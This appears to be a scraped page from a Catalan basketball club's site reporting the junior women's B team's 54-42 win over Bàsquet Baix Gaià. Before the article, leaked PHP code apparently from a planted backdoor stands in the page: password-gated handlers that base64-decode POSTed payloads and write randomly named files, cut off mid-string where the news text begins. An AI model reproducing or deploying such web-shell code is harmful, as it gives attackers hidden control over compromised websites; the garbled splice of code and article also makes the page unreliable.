function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení B reacciona a temps i derrota el Bàsquet Baix Gaià (54-42) - Tgn Bàsquet Club -

El júnior femení B reacciona a temps i derrota el Bàsquet Baix Gaià (54-42)

Updated: octubre 22, 2019

L’equip júnior femení B va derrotar el Bàsquet Baix Gaià en un matx amb alternances en el marcador. El conjunt que entrena Laureà Català va fer una molt bona sortida, molt intens i agressiu i això li va permetre arribar al final del primer quart amb un resultat de 14-5. Però a partir d’aquests moments les locals van perdre pistonada i les visitants van retallar diferències primer (26-21 al descans) i capgirar el resultat posteriorment (30-31 a 13 minuts del final). Tot i que la dinàmica no era bona, el TGN Bàsquet va reaccionar, va recuperar la intensitat de l’inici del partit i va marcar un parcial de 24-11 en els últims 13 minuts que li va atorgar el triomf.